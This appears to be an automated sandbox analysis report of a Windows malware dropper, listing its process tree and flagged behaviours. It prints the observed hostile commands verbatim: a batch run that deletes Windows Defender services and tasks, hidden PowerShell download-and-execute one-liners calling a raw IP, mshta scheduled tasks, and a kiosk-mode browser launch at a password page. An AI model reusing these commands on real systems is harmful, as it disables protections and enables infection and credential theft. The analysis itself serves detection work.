pid Process 1440 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 2844 rapes.exe 1616 Passwords.com 1616 Passwords.com 1616 Passwords.com 1900 powershell.exe 1900 powershell.exe 1900 powershell.exe 2960 Temp4VXWK9F8MQQTV7HVKXY9QRO69CDBKG7U.EXE 2140 powershell.exe 1236 powershell.exe 1016 powershell.exe 1488 powershell.exe 1616 Passwords.com 1616 Passwords.com 1616 Passwords.com 1616 Passwords.com 1488 powershell.exe 1488 powershell.exe 880 483d2fa8a0d53818306efeb32d3.exe 3008 e701a6ea58.exe 3008 e701a6ea58.exe 3008 e701a6ea58.exe 3008 e701a6ea58.exe 3008 e701a6ea58.exe 3052 86fe7fa314.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 2100 d9365fab09.exe 2100 d9365fab09.exe 2100 d9365fab09.exe 3212 Passwords.com 3212 Passwords.com 3212 Passwords.com 3212 Passwords.com 3212 Passwords.com 3212 Passwords.com 3212 Passwords.com 3552 3f471eadc8.exe 1716 a1d4ceb986.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 480 Process not Found 480 Process not Found -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 2332 tasklist.exe Token: SeDebugPrivilege 1236 tasklist.exe Token: SeDebugPrivilege 1900 powershell.exe Token: SeDebugPrivilege 2140 powershell.exe Token: SeDebugPrivilege 1236 powershell.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeDebugPrivilege 1652 taskkill.exe Token: SeDebugPrivilege 1768 taskkill.exe Token: SeDebugPrivilege 1572 taskkill.exe Token: SeDebugPrivilege 1544 taskkill.exe Token: SeDebugPrivilege 588 taskkill.exe Token: SeDebugPrivilege 2424 firefox.exe Token: SeDebugPrivilege 2424 firefox.exe Token: SeDebugPrivilege 2100 d9365fab09.exe Token: SeDebugPrivilege 3764 tasklist.exe Token: SeDebugPrivilege 3888 tasklist.exe -
Suspicious use of FindShellTrayWindow 24 IoCs
pid Process 1440 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 1616 Passwords.com 1616 Passwords.com 1616 Passwords.com 2836 8bd4910853.exe 2836 8bd4910853.exe 2836 8bd4910853.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 3212 Passwords.com 3212 Passwords.com 3212 Passwords.com -
Suspicious use of SendNotifyMessage 22 IoCs
pid Process 1616 Passwords.com 1616 Passwords.com 1616 Passwords.com 2836 8bd4910853.exe 2836 8bd4910853.exe 2836 8bd4910853.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 1792 34db9b46bd.exe 3212 Passwords.com 3212 Passwords.com 3212 Passwords.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1440 wrote to memory of 2844 1440 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 30 PID 1440 wrote to memory of 2844 1440 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 30 PID 1440 wrote to memory of 2844 1440 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 30 PID 1440 wrote to memory of 2844 1440 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 30 PID 2844 wrote to memory of 1120 2844 rapes.exe 33 PID 2844 wrote to memory of 1120 2844 rapes.exe 33 PID 2844 wrote to memory of 1120 2844 rapes.exe 33 PID 2844 wrote to memory of 1120 2844 rapes.exe 33 PID 1120 wrote to memory of 2696 1120 apple.exe 34 PID 1120 wrote to memory of 2696 1120 apple.exe 34 PID 1120 wrote to memory of 2696 1120 apple.exe 34 PID 1120 wrote to memory of 2696 1120 apple.exe 34 PID 2696 wrote to memory of 1424 2696 11.exe 35 PID 2696 wrote to memory of 1424 2696 11.exe 35 PID 2696 wrote to memory of 1424 2696 11.exe 35 PID 2696 wrote to memory of 1424 2696 11.exe 35 PID 1424 wrote to memory of 1664 1424 cmd.exe 37 PID 1424 wrote to memory of 1664 1424 cmd.exe 37 PID 1424 wrote to memory of 1664 1424 cmd.exe 37 PID 1424 wrote to memory of 1664 1424 cmd.exe 37 PID 1664 wrote to memory of 1092 1664 11.exe 38 PID 1664 wrote to memory of 1092 1664 11.exe 38 PID 1664 wrote to memory of 1092 1664 11.exe 38 PID 1664 wrote to memory of 1092 1664 11.exe 38 PID 1092 wrote to memory of 1596 1092 cmd.exe 40 PID 1092 wrote to memory of 1596 1092 cmd.exe 40 PID 1092 wrote to memory of 1596 1092 cmd.exe 40 PID 1092 wrote to memory of 2020 1092 cmd.exe 41 PID 1092 wrote to memory of 2020 1092 cmd.exe 41 PID 1092 wrote to memory of 2020 1092 cmd.exe 41 PID 1092 wrote to memory of 1984 1092 cmd.exe 42 PID 1092 wrote to memory of 1984 1092 cmd.exe 42 PID 1092 wrote to memory of 1984 1092 cmd.exe 42 PID 1092 wrote to memory of 3064 1092 cmd.exe 43 PID 1092 wrote to memory of 3064 1092 cmd.exe 43 PID 1092 wrote to memory of 3064 1092 cmd.exe 43 PID 1092 wrote to memory of 1660 1092 cmd.exe 44 PID 1092 wrote to memory of 1660 1092 cmd.exe 44 PID 1092 wrote to memory of 1660 1092 cmd.exe 44 PID 1092 wrote to memory of 3044 1092 cmd.exe 45 PID 1092 wrote to memory of 3044 1092 cmd.exe 45 PID 1092 wrote to memory of 3044 1092 cmd.exe 45 PID 1092 wrote to memory of 3068 1092 cmd.exe 46 PID 1092 wrote to memory of 3068 1092 cmd.exe 46 PID 1092 wrote to memory of 3068 1092 cmd.exe 46 PID 1092 wrote to memory of 3056 1092 cmd.exe 47 PID 1092 wrote to memory of 3056 1092 cmd.exe 47 PID 1092 wrote to memory of 3056 1092 cmd.exe 47 PID 1092 wrote to memory of 1436 1092 cmd.exe 48 PID 1092 wrote to memory of 1436 1092 cmd.exe 48 PID 1092 wrote to memory of 1436 1092 cmd.exe 48 PID 1092 wrote to memory of 1876 1092 cmd.exe 49 PID 1092 wrote to memory of 1876 1092 cmd.exe 49 PID 1092 wrote to memory of 1876 1092 cmd.exe 49 PID 1092 wrote to memory of 2160 1092 cmd.exe 50 PID 1092 wrote to memory of 2160 1092 cmd.exe 50 PID 1092 wrote to memory of 2160 1092 cmd.exe 50 PID 1092 wrote to memory of 2060 1092 cmd.exe 51 PID 1092 wrote to memory of 2060 1092 cmd.exe 51 PID 1092 wrote to memory of 2060 1092 cmd.exe 51 PID 1092 wrote to memory of 1728 1092 cmd.exe 52 PID 1092 wrote to memory of 1728 1092 cmd.exe 52 PID 1092 wrote to memory of 1728 1092 cmd.exe 52 PID 1092 wrote to memory of 2484 1092 cmd.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe"C:\Users\Admin\AppData\Local\Temp\61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FA56.tmp\FA57.tmp\FA58.bat C:\Users\Admin\AppData\Local\Temp\11.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe" go6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FAB4.tmp\FAB5.tmp\FAB6.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"7⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:1596
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:2020
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:1984
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:3064
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:1660
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3044
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3068
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:3056
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:1436
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:1876
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:2160
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:2060
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:1728
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:2484
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:1088
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:1116
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:2076
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:1448
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:1300
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:108
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:2848
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵PID:2164
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:2664
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:448
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:1684
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:1560
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:952
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:1628
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:1176
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:1824
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:1096
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:2708
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:552
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:236
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:984
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:1500
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:1568
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:1016
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:1544
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:2580
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:544
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:1816
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:2312
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:1676
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:3036
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:1980
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:1592
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:2424
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:2240
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:1760
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:988
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:2552
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:2444
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:1696
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:1136
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:580
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:1284
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:1504
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:1992
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1712
-
-
C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:588 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2824 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:2056
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵
- System Location Discovery: System Language Discovery
PID:1076
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵
- System Location Discovery: System Language Discovery
PID:1960
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵
- System Location Discovery: System Language Discovery
PID:1388
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵
- System Location Discovery: System Language Discovery
PID:1976
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com5⤵
- System Location Discovery: System Language Discovery
PID:1084
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N5⤵
- System Location Discovery: System Language Discovery
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1616
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338040101\8bd4910853.exe"C:\Users\Admin\AppData\Local\Temp\10338040101\8bd4910853.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2836 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 4g6l1maQn6R /tr "mshta C:\Users\Admin\AppData\Local\Temp\BGnwf7kxh.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:2892 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 4g6l1maQn6R /tr "mshta C:\Users\Admin\AppData\Local\Temp\BGnwf7kxh.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1828
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\BGnwf7kxh.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'4VXWK9F8MQQTV7HVKXY9QRO69CDBKG7U.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900 -
C:\Users\Admin\AppData\Local\Temp4VXWK9F8MQQTV7HVKXY9QRO69CDBKG7U.EXE"C:\Users\Admin\AppData\Local\Temp4VXWK9F8MQQTV7HVKXY9QRO69CDBKG7U.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2960
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10338050121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:1632 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:2056 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:3028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:1568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "XmYlJmaROu1" /tr "mshta \"C:\Temp\A7PFjaDN3.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2312
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\A7PFjaDN3.hta"4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:880
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338160101\d9962a0c25.exe"C:\Users\Admin\AppData\Local\Temp\10338160101\d9962a0c25.exe"3⤵
- Executes dropped EXE
PID:2760 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2760 -s 364⤵
- Loads dropped DLL
PID:2328
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338170101\e701a6ea58.exe"C:\Users\Admin\AppData\Local\Temp\10338170101\e701a6ea58.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3008
-
-
C:\Users\Admin\AppData\Local\Temp\10338180101\86fe7fa314.exe"C:\Users\Admin\AppData\Local\Temp\10338180101\86fe7fa314.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\10338190101\34db9b46bd.exe"C:\Users\Admin\AppData\Local\Temp\10338190101\34db9b46bd.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1792 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:1980
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2424 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2424.0.970805209\1514844380" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {322014ae-5748-43ce-8f8b-b5ab24c5ff4b} 2424 "\\.\pipe\gecko-crash-server-pipe.2424" 1300 f6d8b58 gpu6⤵PID:2244
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2424.1.668685836\335114584" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bce5a15c-da28-48b7-83e3-f282ef0544da} 2424 "\\.\pipe\gecko-crash-server-pipe.2424" 1496 d71b58 socket6⤵PID:1756
-
-
